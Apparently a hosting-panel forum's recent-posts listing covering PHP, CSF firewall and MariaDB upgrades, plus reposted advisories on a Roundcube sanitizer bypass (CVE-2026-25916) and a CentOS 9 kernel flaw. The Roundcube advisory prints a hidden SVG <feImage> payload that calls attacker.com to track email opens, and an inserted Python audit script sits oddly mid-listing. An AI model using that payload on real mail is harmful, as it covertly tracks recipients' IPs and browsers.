21
PHP / Re: how to install and configure relay extension for php-fpm83 in cwp
« Last post by overseer on February 10, 2026, 02:53:53 PM »
I would look at this guide as a model:
https://www.alphagnu.com/topic/614-how-to-add-custom-php-fpm-84-85-support-to-cwp-on-almalinux-9x/
(You could try to customize the build scripts/extension scripts for 8.3 using this method.)
22
PHP Selector / Re: Support for PHP 8.4
« Last post by Andrew C on February 10, 2026, 11:41:23 AM »
Hello,
When will the change logs be updated? Still showing 13/11/2024?
Thanks
23
PHP Selector / Re: Support for PHP 8.4
« Last post by cHAp on February 09, 2026, 10:45:06 PM »
Hello,
When will the major update be released?
24
E-Mail / Roundcube Webmail Vulnerability Lets Attackers Track Email Opens
« Last post by Starburst on February 09, 2026, 06:24:31 PM »
Source: Cyber Press https://cyberpress.org/roundcube-webmail-vulnerability-lets-attackers-track-email-opens/
In a sneaky bypass of email security features, a vulnerability in Roundcube Webmail exposes users to hidden tracking even when “Block remote images” is enabled.
Discovered during holiday tinkering, this issue (CVE-2026-25916) affects versions before 1.5.13 and 1.6.13.
Attackers can now confirm if you’ve opened their emails, logging your IP address and browser details without your knowledge.
The Problem in Plain Terms
Roundcube’s HTML sanitizer is like a bouncer at a club. It blocks external images in common spots: <img src>, <image href>, and <use href>.
These checks use a strict function called is_image_attribute() that rejects outside URLs when remote loading is off.
But the SVG element <feImage> slipped through. Its href attribute, meant to pull in remote images for filters, gets treated as a harmless link instead.
The sanitizer routes it via wash_link(), which allows HTTP/HTTPS URLs. Result? Browsers fetch the attacker’s image invisibly, bypassing the block.
Security researcher “nullcathedral” spotted this while auditing recent SVG fixes in Roundcube’s rcube_washtml.php.
One SVG bug often hints at more, and <feImage> stood out because it renders like an <img> but dodges the image checks.
How Attackers Exploit It
Imagine receiving this malicious HTML in an email:
Code:
    <svg width="1" height="1" style="position:absolute;left:-9999px;">
      <defs>
        <filter id="t">
          <feImage href="https://attacker.com/track?email=victim@test.com" width="1" height="1"/>
        </filter>
      </defs>
      <rect filter="url(#t)" width="1" height="1"/>
    </svg>
It’s a tiny, off-screen SVG. When rendered, the browser grabs the href image, pinging the attacker’s server.
No click required, just opening the email triggers it. Perfect for phishing campaigns or spam tracking.
CVE Details
CVE: CVE-2026-25916
Vendor: Roundcube
Product: Roundcube Webmail
Affected Versions: <1.5.13, <1.6.13
Disclosure Date: 2026-02-08
Developers patched it swiftly. The update tweaks is_image_attribute() with a regex: ($attr == 'href' && preg_match('/^(feimage|image|use)$/i', $tag)). Now <feImage href> gets blocked like other images.
2026-01-04: Reported to Roundcube.
2026-02-08: Versions 1.5.13 and 1.6.13 released.
2026-02-09: CVE assigned.
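The routing gap described in the post above, as an added example that is not part of the post and is not Roundcube's code: a simplified Python model of the image-attribute check before and after the patch, run over a constructed mail body to list remote URLs that would be treated as plain links. The AUTO_FETCH set, the audit() helper and the tracker.example URLs are assumptions made for illustration.

```python
import re
from html.parser import HTMLParser

# Simplified model of the check the article describes (not Roundcube's code).
PRE_PATCH_HREF_TAGS = re.compile(r"^(image|use)$", re.I)
POST_PATCH_HREF_TAGS = re.compile(r"^(feimage|image|use)$", re.I)
REMOTE_URL = re.compile(r"^\s*(https?:)?//", re.I)
# Assumption: elements whose URL the browser fetches on render, without a click.
AUTO_FETCH = {"img", "image", "use", "feimage"}

def is_image_attribute(tag, attr, href_tags):
    """True when the attribute must obey the 'block remote images' setting."""
    if tag == "img" and attr == "src":
        return True
    return attr == "href" and bool(href_tags.match(tag))

class RemoteLoadAudit(HTMLParser):
    """Records remote URLs on auto-fetching elements that skip the image check."""
    def __init__(self, href_tags):
        super().__init__()
        self.href_tags = href_tags
        self.leaks = []

    def handle_starttag(self, tag, attrs):  # tag and attr names arrive lowercased
        if tag not in AUTO_FETCH:
            return  # e.g. <a href>: a real link, fetched only on click
        for name, value in attrs:
            if name in ("src", "href") and value and REMOTE_URL.match(value):
                if not is_image_attribute(tag, name, self.href_tags):
                    self.leaks.append((tag, name, value))

def audit(html, href_tags):
    parser = RemoteLoadAudit(href_tags)
    parser.feed(html)
    parser.close()
    return parser.leaks

# Constructed sample body: a normal link, a classic pixel, and an <feImage> filter.
SAMPLE_MAIL = """
<p>Hello <a href="https://example.org/">link</a></p>
<img src="https://tracker.example/pixel.png">
<svg width="1" height="1"><defs><filter id="t">
<feImage href="https://tracker.example/open?id=1" width="1" height="1"/>
</filter></defs><rect filter="url(#t)" width="1" height="1"/></svg>
"""

if __name__ == "__main__":
    print("pre-patch leaks: ", audit(SAMPLE_MAIL, PRE_PATCH_HREF_TAGS))
    print("post-patch leaks:", audit(SAMPLE_MAIL, POST_PATCH_HREF_TAGS))
```

The same audit can serve as a regression check when a new SVG element is added to a sanitizer's allowlist: anything that renders a URL automatically belongs in the image check, not the link check.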
25
CentOS 9 Problems / New CentOS 9 Vulnerability Allows Attackers to Escalate Privileges to Root
« Last post by Starburst on February 09, 2026, 03:36:30 PM »
For those running CentOS Stream 9, this is a Major Vulnerability.
New CentOS 9 Vulnerability Allows Attackers to Escalate Privileges to Root
Cyber Press ®
See: https://www.linkedin.com/pulse/new-centos-9-vulnerability-allows-attackers-escalate-privileges-a8xnc/
A newly identified privilege escalation flaw in CentOS Stream 9 has triggered significant security concerns within the Linux community.
The vulnerability, originating from a Use-After-Free (UAF) condition in the Linux kernel’s networking subsystem, allows a local user to escalate privileges to root.
The issue was spotlighted at the TyphoonPWN 2025 hacking competition, where it won first place in the Linux category.
Adding urgency, a Proof-of-Concept (PoC) exploit has been publicly released, enabling attackers to achieve full system compromise on vulnerable installations reliably.
Code:
    static s32 cake_enqueue(struct sk_buff *skb, struct Qdisc *sch,
                            struct sk_buff **to_free)
    {
        // ...
        if (q->buffer_used > q->buffer_limit) { // [1] Check buffer limit
            u32 dropped = 0;
            while (q->buffer_used > q->buffer_limit) {
                dropped++;
                cake_drop(sch, to_free); // [2] Packet is DROPPED here
            }
            b->drop_overlimit += dropped;
        }
        return NET_XMIT_SUCCESS; // [!] Returns SUCCESS anyway
    }
Root Cause in CAKE Scheduler
The flaw exists in the sch_cake (Common Applications Kept Enhanced) packet scheduler, a component responsible for managing network traffic shaping in the kernel.
The issue specifically lies in the cake_enqueue() function, which mishandles return codes during packet drops.
Under buffer pressure, CAKE discards packets using cake_drop(), yet incorrectly returns NET_XMIT_SUCCESS, indicating to upper layers that the packet was successfully queued.
26
CSF Firewall / Re: Should we update CSF to V15??
« Last post by kalybg on February 09, 2026, 07:38:42 AM »
OK .... Thank you
27
CSF Firewall / Re: Should we update CSF to V15??
« Last post by Starburst on February 06, 2026, 02:19:35 PM »
They are 2 separate CSF forks.
Hence all the forks have different version numbers now, not a universal one.
Some could use the last CSF v15.00 code, call it CSF2 with v1.0
If you want to switch to the Sentinel fork, you can.
But from what I read it's aimed more at cPanel.
It also doesn't have the support like the Aetherinox fork does.
But it's all personal preference at this time.
28
CSF Firewall / Re: Should we update CSF to V15??
« Last post by kalybg on February 06, 2026, 09:31:00 AM »
Hello,
I updated CSF Firewall – to v15.08 using these instructions - https://starburst.help/control-web-panel-cwp/control-web-panel-cwp-admin-tutorials/aetherinox-csf-firewall-update-to-v15-08/
I want to ask if it is possible to update to version 15.11 using this source - https://sentinelfirewall.org/docs/upgrade-from-csf/
Greetings,
29
CentOS 9 Problems / Re: mysql update
« Last post by zeejdeej on February 05, 2026, 10:53:18 PM »
thanks for the help highly appreciated.
30
CentOS 9 Problems / Re: mysql update
« Last post by overseer on February 05, 2026, 10:36:56 PM »
I would suggest updating to MariaDB 10.11 LTS version:
https://starburst.help/control-web-panel-cwp/control-web-panel-cwp-admin-tutorials/upgrade-mariadb-10-x-to-10-11-with-cwp-on-almalinux-9/
or
https://www.alphagnu.com/topic/23-upgrade-mariadb-1011-in-cwp-centos-7-centos-8-stream-almalinux-78-rockylinux-78/
Recent Posts